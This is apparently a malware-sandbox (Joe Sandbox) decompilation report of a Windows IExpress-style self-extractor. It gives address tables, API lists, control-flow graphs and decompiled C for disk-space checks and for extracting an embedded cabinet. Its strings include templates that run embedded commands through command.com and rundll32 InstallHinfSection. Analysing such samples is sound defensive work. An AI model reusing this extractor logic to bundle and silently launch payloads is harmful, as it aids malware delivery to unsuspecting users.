                                                                      0x011d1da8
                                                                      0x011d1dac
                                                                      0x011d1dae
                                                                      0x011d1db4
                                                                      0x011d1db7
                                                                      0x011d1db7
                                                                      0x011d1db9
                                                                      0x011d1dba
                                                                      0x011d1dbe
                                                                      0x011d1dc3
                                                                      0x011d1dce
                                                                      0x011d1dd2
                                                                      0x011d1deb
                                                                      0x00000000
                                                                      0x011d1df0
                                                                      0x00000000
                                                                      0x011d1dd2
                                                                      0x011d1bf7
                                                                      0x011d1bfe
                                                                      0x011d1c07
                                                                      0x011d1d55
                                                                      0x011d1d5a
                                                                      0x011d1d5b
                                                                      0x011d1d5d
                                                                      0x011d1d5e
                                                                      0x00000000
                                                                      0x011d1c1b
                                                                      0x011d1c1b
                                                                      0x011d1c20
                                                                      0x011d1c2c
                                                                      0x011d1c33
                                                                      0x011d1c38
                                                                      0x011d1c3a
                                                                      0x011d1c3a
                                                                      0x011d1c40
                                                                      0x011d1c4b
                                                                      0x011d1c4b
                                                                      0x011d1c5d
                                                                      0x011d1c61
                                                                      0x011d1dd4
                                                                      0x011d1dd4
                                                                      0x011d1dd6
                                                                      0x011d1ddb
                                                                      0x011d1ddc
                                                                      0x011d1dde
                                                                      0x011d1d64
                                                                      0x011d1d64
                                                                      0x011d1d67
                                                                      0x011d1d6c
                                                                      0x00000000
                                                                      0x011d1c67
                                                                      0x011d1c67
                                                                      0x011d1c6d
                                                                      0x011d1c72
                                                                      0x011d1c74
                                                                      0x011d1c74
                                                                      0x011d1c8e
                                                                      0x011d1c99
                                                                      0x011d1cc0
                                                                      0x011d1cf8
                                                                      0x011d1d07
                                                                      0x011d1d23
                                                                      0x011d1d09
                                                                      0x011d1d14
                                                                      0x011d1d1b
                                                                      0x011d1d1b
                                                                      0x011d1d2b
                                                                      0x011d1d2d
                                                                      0x011d1d2d
                                                                      0x011d1d38
                                                                      0x011d1d39
                                                                      0x011d1d46
                                                                      0x011d1cc2
                                                                      0x011d1cc2
                                                                      0x011d1ccc
                                                                      0x011d1cce
                                                                      0x011d1cce
                                                                      0x011d1cdb
                                                                      0x011d1ce6
                                                                      0x011d1cee
                                                                      0x011d1cee
                                                                      0x011d1e89
                                                                      0x011d1e91
                                                                      0x011d1e92
                                                                      0x011d1e94
                                                                      0x011d1e97
                                                                      0x011d1ea4
                                                                      0x011d1ea4
                                                                      0x011d1c61
                                                                      0x011d1c07
                                                                      0x011d1bd3
                                                                      0x011d1b7b

                                                                      APIs
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 011D1BE7
                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 011D1BFE
                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 011D1C57
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 011D1C88
                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,011D1140,00000000,00000008,?), ref: 011D1CB8
                                                                      • GetShortPathNameA.KERNEL32 ref: 011D1D1B
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                      • API String ID: 383838535-3368923722
                                                                      • Opcode ID: 26175ca9ee12eaa4888b169dfb6426597a471f6cf36367bfb9033925e3a116f4
                                                                      • Instruction ID: 746587fc5310d05d3a81003d002939be4b49b45355cca8176c75d9e66d9b2cfc
                                                                      • Opcode Fuzzy Hash: 26175ca9ee12eaa4888b169dfb6426597a471f6cf36367bfb9033925e3a116f4
                                                                      • Instruction Fuzzy Hash: 90A146B0A002197BEF2DDB38CC44FEA7B69AF51314F144298E955A32C1DBB49EC5CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 324 11d597d-11d59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 11d59dd-11d5a1b GetDiskFreeSpaceA 324->325 326 11d59bb-11d59d8 call 11d44b9 call 11d6285 324->326 327 11d5ba1-11d5bde memset call 11d6285 GetLastError FormatMessageA 325->327 328 11d5a21-11d5a4a MulDiv 325->328 341 11d5c05-11d5c14 call 11d6ce0 326->341 337 11d5be3-11d5bfc call 11d44b9 SetCurrentDirectoryA 327->337 328->327 331 11d5a50-11d5a6c GetVolumeInformationA 328->331 334 11d5a6e-11d5ab0 memset call 11d6285 GetLastError FormatMessageA 331->334 335 11d5ab5-11d5aca SetCurrentDirectoryA 331->335 334->337 339 11d5acc-11d5ad1 335->339 351 11d5c02 337->351 344 11d5ad3-11d5ad8 339->344 345 11d5ae2-11d5ae4 339->345 344->345 347 11d5ada-11d5ae0 344->347 349 11d5ae7-11d5af8 345->349 350 11d5ae6 345->350 347->339 347->345 353 11d5af9-11d5afb 349->353 350->349 354 11d5c04 351->354 355 11d5afd-11d5b03 353->355 356 11d5b05-11d5b08 353->356 354->341 355->353 355->356 357 11d5b0a-11d5b1b call 11d44b9 356->357 358 11d5b20-11d5b27 356->358 357->351 360 11d5b29-11d5b33 358->360 361 11d5b52-11d5b5b 358->361 360->361 363 11d5b35-11d5b50 360->363 364 11d5b62-11d5b6d 361->364 363->364 365 11d5b6f-11d5b74 364->365 366 11d5b76-11d5b7d 364->366 367 11d5b85 365->367 368 11d5b7f-11d5b81 366->368 369 11d5b83 366->369 370 11d5b87-11d5b94 call 11d268b 367->370 371 11d5b96-11d5b9f 367->371 368->367 369->367 370->354 371->354
                                                                      C-Code - Quality: 96%
                                                                      			E011D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				char _v16;
                                                                      				char _v276;
                                                                      				char _v788;
                                                                      				long _v792;
                                                                      				long _v796;
                                                                      				long _v800;
                                                                      				signed int _v804;
                                                                      				long _v808;
                                                                      				int _v812;
                                                                      				long _v816;
                                                                      				long _v820;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				signed int _t46;
                                                                      				int _t50;
                                                                      				signed int _t55;
                                                                      				void* _t66;
                                                                      				int _t69;
                                                                      				signed int _t73;
                                                                      				signed short _t78;
                                                                      				signed int _t87;
                                                                      				signed int _t101;
                                                                      				int _t102;
                                                                      				unsigned int _t103;
                                                                      				unsigned int _t105;
                                                                      				signed int _t111;
                                                                      				long _t112;
                                                                      				signed int _t116;
                                                                      				CHAR* _t118;
                                                                      				signed int _t119;
                                                                      				signed int _t120;
                                                                      
                                                                      				_t114 = __edi;
                                                                      				_t46 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t46 ^ _t120;
                                                                      				_v804 = __edx;
                                                                      				_t118 = __ecx;
                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                      				if(_t50 != 0) {
                                                                      					_push(__edi);
                                                                      					_v796 = 0;
                                                                      					_v792 = 0;
                                                                      					_v800 = 0;
                                                                      					_v808 = 0;
                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                      					__eflags = _t55;
                                                                      					if(_t55 == 0) {
                                                                      						L29:
                                                                      						memset( &_v788, 0, 0x200);
                                                                      						 *0x11d9124 = E011D6285();
                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                      						_t110 = 0x4b0;
                                                                      						L30:
                                                                      						__eflags = 0;
                                                                      						E011D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                      						SetCurrentDirectoryA( &_v276);
                                                                      						L31:
                                                                      						_t66 = 0;
                                                                      						__eflags = 0;
                                                                      						L32:
                                                                      						_pop(_t114);
                                                                      						goto L33;
                                                                      					}
                                                                      					_t69 = _v792 * _v796;
                                                                      					_v812 = _t69;
                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                      					__eflags = _t116;
                                                                      					if(_t116 == 0) {
                                                                      						goto L29;
                                                                      					}
                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                      					__eflags = _t73;
                                                                      					if(_t73 != 0) {
                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                      						_t101 =  &_v16;
                                                                      						_t111 = 6;
                                                                      						_t119 = _t118 - _t101;
                                                                      						__eflags = _t119;
                                                                      						while(1) {
                                                                      							_t22 = _t111 - 4; // 0x2
                                                                      							__eflags = _t22;
                                                                      							if(_t22 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                      							__eflags = _t87;
                                                                      							if(_t87 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							 *_t101 = _t87;
                                                                      							_t101 = _t101 + 1;
                                                                      							_t111 = _t111 - 1;
                                                                      							__eflags = _t111;
                                                                      							if(_t111 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t111;
                                                                      						if(_t111 == 0) {
                                                                      							_t101 = _t101 - 1;
                                                                      							__eflags = _t101;
                                                                      						}
                                                                      						 *_t101 = 0;
                                                                      						_t112 = 0x200;
                                                                      						_t102 = _v812;
                                                                      						_t78 = 0;
                                                                      						_t118 = 8;
                                                                      						while(1) {
                                                                      							__eflags = _t102 - _t112;
                                                                      							if(_t102 == _t112) {
                                                                      								break;
                                                                      							}
                                                                      							_t112 = _t112 + _t112;
                                                                      							_t78 = _t78 + 1;
                                                                      							__eflags = _t78 - _t118;
                                                                      							if(_t78 < _t118) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t78 - _t118;
                                                                      						if(_t78 != _t118) {
                                                                      							__eflags =  *0x11d9a34 & 0x00000008;
                                                                      							if(( *0x11d9a34 & 0x00000008) == 0) {
                                                                      								L20:
                                                                      								_t103 =  *0x11d9a38; // 0x0
                                                                      								_t110 =  *((intOrPtr*)(0x11d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                      								L21:
                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                      									__eflags = _v804 & 0x00000001;
                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                      										__eflags = _t103 - _t116;
                                                                      									} else {
                                                                      										__eflags = _t110 - _t116;
                                                                      									}
                                                                      								} else {
                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                      								}
                                                                      								if(__eflags <= 0) {
                                                                      									 *0x11d9124 = 0;
                                                                      									_t66 = 1;
                                                                      								} else {
                                                                      									_t66 = E011D268B(_a4, _t110, _t103,  &_v16);
                                                                      								}
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags = _v816 & 0x00008000;
                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                      								goto L20;
                                                                      							}
                                                                      							_t105 =  *0x11d9a38; // 0x0
                                                                      							_t110 =  *((intOrPtr*)(0x11d89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x11d89e0 + (_t78 & 0x0000ffff) * 4));
                                                                      							_t103 = (_t105 >> 2) +  *0x11d9a38;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t110 = 0x4c5;
                                                                      						E011D44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                      						goto L31;
                                                                      					}
                                                                      					memset( &_v788, 0, 0x200);
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                      					_t110 = 0x4f9;
                                                                      					goto L30;
                                                                      				} else {
                                                                      					_t110 = 0x4bc;
                                                                      					E011D44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					_t66 = 0;
                                                                      					L33:
                                                                      					return E011D6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                      				}
                                                                      			}



































                                                                      0x011d597d
                                                                      0x011d5988
                                                                      0x011d598f
                                                                      0x011d599a
                                                                      0x011d59a6
                                                                      0x011d59a8
                                                                      0x011d59af
                                                                      0x011d59b9
                                                                      0x011d59dd
                                                                      0x011d59e4
                                                                      0x011d59f1
                                                                      0x011d59fe
                                                                      0x011d5a0b
                                                                      0x011d5a13
                                                                      0x011d5a19
                                                                      0x011d5a1b
                                                                      0x011d5ba1
                                                                      0x011d5baf
                                                                      0x011d5bbd
                                                                      0x011d5bd8
                                                                      0x011d5bde
                                                                      0x011d5be3
                                                                      0x011d5bec
                                                                      0x011d5bf0
                                                                      0x011d5bfc
                                                                      0x011d5c02
                                                                      0x011d5c02
                                                                      0x011d5c02
                                                                      0x011d5c04
                                                                      0x011d5c04
                                                                      0x00000000
                                                                      0x011d5c04
                                                                      0x011d5a27
                                                                      0x011d5a3a
                                                                      0x011d5a46
                                                                      0x011d5a48
                                                                      0x011d5a4a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5a64
                                                                      0x011d5a6a
                                                                      0x011d5a6c
                                                                      0x011d5abc
                                                                      0x011d5ac2
                                                                      0x011d5ac9
                                                                      0x011d5aca
                                                                      0x011d5aca
                                                                      0x011d5acc
                                                                      0x011d5acc
                                                                      0x011d5acf
                                                                      0x011d5ad1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5ad3
                                                                      0x011d5ad6
                                                                      0x011d5ad8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5ada
                                                                      0x011d5adc
                                                                      0x011d5add
                                                                      0x011d5add
                                                                      0x011d5ae0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5ae0
                                                                      0x011d5ae2
                                                                      0x011d5ae4
                                                                      0x011d5ae6
                                                                      0x011d5ae6
                                                                      0x011d5ae6
                                                                      0x011d5ae9
                                                                      0x011d5aeb
                                                                      0x011d5af0
                                                                      0x011d5af6
                                                                      0x011d5af8
                                                                      0x011d5af9
                                                                      0x011d5af9
                                                                      0x011d5afb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5afd
                                                                      0x011d5aff
                                                                      0x011d5b00
                                                                      0x011d5b03
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5b03
                                                                      0x011d5b05
                                                                      0x011d5b08
                                                                      0x011d5b20
                                                                      0x011d5b27
                                                                      0x011d5b52
                                                                      0x011d5b52
                                                                      0x011d5b5b
                                                                      0x011d5b62
                                                                      0x011d5b6b
                                                                      0x011d5b6d
                                                                      0x011d5b76
                                                                      0x011d5b7d
                                                                      0x011d5b83
                                                                      0x011d5b7f
                                                                      0x011d5b7f
                                                                      0x011d5b7f
                                                                      0x011d5b6f
                                                                      0x011d5b72
                                                                      0x011d5b72
                                                                      0x011d5b85
                                                                      0x011d5b98
                                                                      0x011d5b9e
                                                                      0x011d5b87
                                                                      0x011d5b8f
                                                                      0x011d5b8f
                                                                      0x00000000
                                                                      0x011d5b85
                                                                      0x011d5b29
                                                                      0x011d5b33
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5b35
                                                                      0x011d5b48
                                                                      0x011d5b4a
                                                                      0x00000000
                                                                      0x011d5b4a
                                                                      0x011d5b0f
                                                                      0x011d5b16
                                                                      0x00000000
                                                                      0x011d5b16
                                                                      0x011d5a7c
                                                                      0x011d5a8a
                                                                      0x011d5aa5
                                                                      0x011d5aab
                                                                      0x00000000
                                                                      0x011d59bb
                                                                      0x011d59c0
                                                                      0x011d59c7
                                                                      0x011d59d1
                                                                      0x011d59d6
                                                                      0x011d5c05
                                                                      0x011d5c14
                                                                      0x011d5c14

                                                                      APIs
                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 011D59A8
                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 011D59AF
                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 011D5A13
                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 011D5A40
                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 011D5A64
                                                                      • memset.MSVCRT ref: 011D5A7C
                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 011D5A98
                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 011D5AA5
                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 011D5BFC
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                      • String ID:
                                                                      • API String ID: 4237285672-0
                                                                      • Opcode ID: 0458179211a8d20c6f617775f923ac8fbdcdcefd7b681b29299b69aef0795783
                                                                      • Instruction ID: 9d7e44c4ee8a8cd27401c8198188bd1cf46459e185bf46f8341c905be9978613
                                                                      • Opcode Fuzzy Hash: 0458179211a8d20c6f617775f923ac8fbdcdcefd7b681b29299b69aef0795783
                                                                      • Instruction Fuzzy Hash: C371A1B190221CAFEB6EDB64DC84BFB77BEEB48344F0440A9E51596144EB349E84CF21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 374 11d4fe0-11d501a call 11d468f FindResourceA LoadResource LockResource 377 11d5161-11d5163 374->377 378 11d5020-11d5027 374->378 379 11d5029-11d5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 11d5057-11d505e call 11d4efd 378->380 379->380 383 11d507c-11d50b4 380->383 384 11d5060-11d5077 call 11d44b9 380->384 389 11d50e8-11d5104 call 11d44b9 383->389 390 11d50b6-11d50da 383->390 388 11d5107-11d510e 384->388 392 11d511d-11d511f 388->392 393 11d5110-11d5117 FreeResource 388->393 402 11d5106 389->402 401 11d50dc 390->401 390->402 394 11d513a-11d5141 392->394 395 11d5121-11d5127 392->395 393->392 399 11d515f 394->399 400 11d5143-11d514a 394->400 395->394 398 11d5129-11d5135 call 11d44b9 395->398 398->394 399->377 400->399 404 11d514c-11d5159 SendMessageA 400->404 405 11d50e3-11d50e6 401->405 402->388 404->399 405->389 405->402
                                                                      C-Code - Quality: 77%
                                                                      			E011D4FE0(void* __edi, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* _t8;
                                                                      				struct HWND__* _t9;
                                                                      				int _t10;
                                                                      				void* _t12;
                                                                      				struct HWND__* _t24;
                                                                      				struct HWND__* _t27;
                                                                      				intOrPtr _t29;
                                                                      				void* _t33;
                                                                      				int _t34;
                                                                      				CHAR* _t36;
                                                                      				int _t37;
                                                                      				intOrPtr _t47;
                                                                      
                                                                      				_t33 = __edi;
                                                                      				_t36 = "CABINET";
                                                                      				 *0x11d9144 = E011D468F(_t36, 0, 0);
                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                      				 *0x11d9140 = _t8;
                                                                      				if(_t8 == 0) {
                                                                      					return _t8;
                                                                      				}
                                                                      				_t9 =  *0x11d8584; // 0x0
                                                                      				if(_t9 != 0) {
                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                      					ShowWindow(GetDlgItem( *0x11d8584, 0x841), 5);
                                                                      				}
                                                                      				_t10 = E011D4EFD(0, 0);
                                                                      				if(_t10 != 0) {
                                                                      					__imp__#20(E011D4CA0, E011D4CC0, E011D4980, E011D4A50, E011D4AD0, E011D4B60, E011D4BC0, 1, 0x11d9148, _t33);
                                                                      					_t34 = _t10;
                                                                      					if(_t34 == 0) {
                                                                      						L8:
                                                                      						_t29 =  *0x11d9148; // 0x0
                                                                      						_t24 =  *0x11d8584; // 0x0
                                                                      						E011D44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                      						_t37 = 0;
                                                                      						L9:
                                                                      						goto L10;
                                                                      					}
                                                                      					__imp__#22(_t34, "*MEMCAB", 0x11d1140, 0, E011D4CD0, 0, 0x11d9140); // executed
                                                                      					_t37 = _t10;
                                                                      					if(_t37 == 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					__imp__#23(_t34); // executed
                                                                      					if(_t10 != 0) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L8;
                                                                      				} else {
                                                                      					_t27 =  *0x11d8584; // 0x0
                                                                      					E011D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                      					_t37 = 0;
                                                                      					L10:
                                                                      					_t12 =  *0x11d9140; // 0x0
                                                                      					if(_t12 != 0) {
                                                                      						FreeResource(_t12);
                                                                      						 *0x11d9140 = 0;
                                                                      					}
                                                                      					if(_t37 == 0) {
                                                                      						_t47 =  *0x11d91d8; // 0x0
                                                                      						if(_t47 == 0) {
                                                                      							E011D44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                      						}
                                                                      					}
                                                                      					if(( *0x11d8a38 & 0x00000001) == 0 && ( *0x11d9a34 & 0x00000001) == 0) {
                                                                      						SendMessageA( *0x11d8584, 0xfa1, _t37, 0);
                                                                      					}
                                                                      					return _t37;
                                                                      				}
                                                                      			}
















                                                                      0x011d4fe0
                                                                      0x011d4fe6
                                                                      0x011d4ff9
                                                                      0x011d500d
                                                                      0x011d5013
                                                                      0x011d501a
                                                                      0x011d5163
                                                                      0x011d5163
                                                                      0x011d5020
                                                                      0x011d5027
                                                                      0x011d5037
                                                                      0x011d5051
                                                                      0x011d5051
                                                                      0x011d5057
                                                                      0x011d505e
                                                                      0x011d50a7
                                                                      0x011d50ad
                                                                      0x011d50b4
                                                                      0x011d50e8
                                                                      0x011d50e8
                                                                      0x011d50ee
                                                                      0x011d50ff
                                                                      0x011d5104
                                                                      0x011d5106
                                                                      0x00000000
                                                                      0x011d5106
                                                                      0x011d50cd
                                                                      0x011d50d3
                                                                      0x011d50da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d50dd
                                                                      0x011d50e6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5060
                                                                      0x011d5060
                                                                      0x011d5070
                                                                      0x011d5075
                                                                      0x011d5107
                                                                      0x011d5107
                                                                      0x011d510e
                                                                      0x011d5111
                                                                      0x011d5117
                                                                      0x011d5117
                                                                      0x011d511f
                                                                      0x011d5121
                                                                      0x011d5127
                                                                      0x011d5135
                                                                      0x011d5135
                                                                      0x011d5127
                                                                      0x011d5141
                                                                      0x011d5159
                                                                      0x011d5159
                                                                      0x00000000
                                                                      0x011d515f

                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 011D4FFE
                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 011D5006
                                                                      • LockResource.KERNEL32(00000000), ref: 011D500D
                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 011D5030
                                                                      • ShowWindow.USER32(00000000), ref: 011D5037
                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 011D504A
                                                                      • ShowWindow.USER32(00000000), ref: 011D5051
                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 011D5111
                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 011D5159
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                      • String ID: *MEMCAB$CABINET
                                                                      • API String ID: 1305606123-2642027498
                                                                      • Opcode ID: 549d8e3f952dad4b6482ea3232d8e5cf47a3a31f0894fc2e68441a4b894e1429
                                                                      • Instruction ID: 62d888948c51a014d98bd50cc732e4cb10f401e017dc2ae3bfd80c84f4a43943
                                                                      • Opcode Fuzzy Hash: 549d8e3f952dad4b6482ea3232d8e5cf47a3a31f0894fc2e68441a4b894e1429
                                                                      • Instruction Fuzzy Hash: 7531DA717433157BE73C5A76FD89F673B6DAB08759F040038F911A2949D7B89C808754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 406 11d2f1d-11d2f3d 407 11d2f6c-11d2f73 call 11d5164 406->407 408 11d2f3f-11d2f46 406->408 417 11d2f79-11d2f80 call 11d55a0 407->417 418 11d3041 407->418 409 11d2f5f-11d2f66 call 11d3a3f 408->409 410 11d2f48 call 11d51e5 408->410 409->407 409->418 415 11d2f4d-11d2f4f 410->415 415->418 420 11d2f55-11d2f5d 415->420 417->418 425 11d2f86-11d2fbe GetSystemDirectoryA call 11d658a LoadLibraryA 417->425 419 11d3043-11d3053 call 11d6ce0 418->419 420->407 420->409 428 11d2ff7-11d3004 FreeLibrary 425->428 429 11d2fc0-11d2fd4 GetProcAddress 425->429 431 11d3017-11d3024 SetCurrentDirectoryA 428->431 432 11d3006-11d300c 428->432 429->428 430 11d2fd6-11d2fee DecryptFileA 429->430 430->428 441 11d2ff0-11d2ff5 430->441 434 11d3054-11d305a 431->434 435 11d3026-11d303c call 11d44b9 call 11d6285 431->435 432->431 433 11d300e call 11d621e 432->433 445 11d3013-11d3015 433->445 437 11d305c call 11d3b26 434->437 438 11d3065-11d306c 434->438 435->418 447 11d3061-11d3063 437->447 443 11d307c-11d3089 438->443 444 11d306e-11d3075 call 11d256d 438->444 441->428 449 11d308b-11d3091 443->449 450 11d30a1-11d30a9 443->450 455 11d307a 444->455 445->418 445->431 447->418 447->438 449->450 456 11d3093 call 11d3ba2 449->456 453 11d30ab-11d30ad 450->453 454 11d30b4-11d30b7 450->454 453->454 458 11d30af call 11d4169 453->458 454->419 455->443 459 11d3098-11d309a 456->459 458->454 459->418 461 11d309c 459->461 461->450
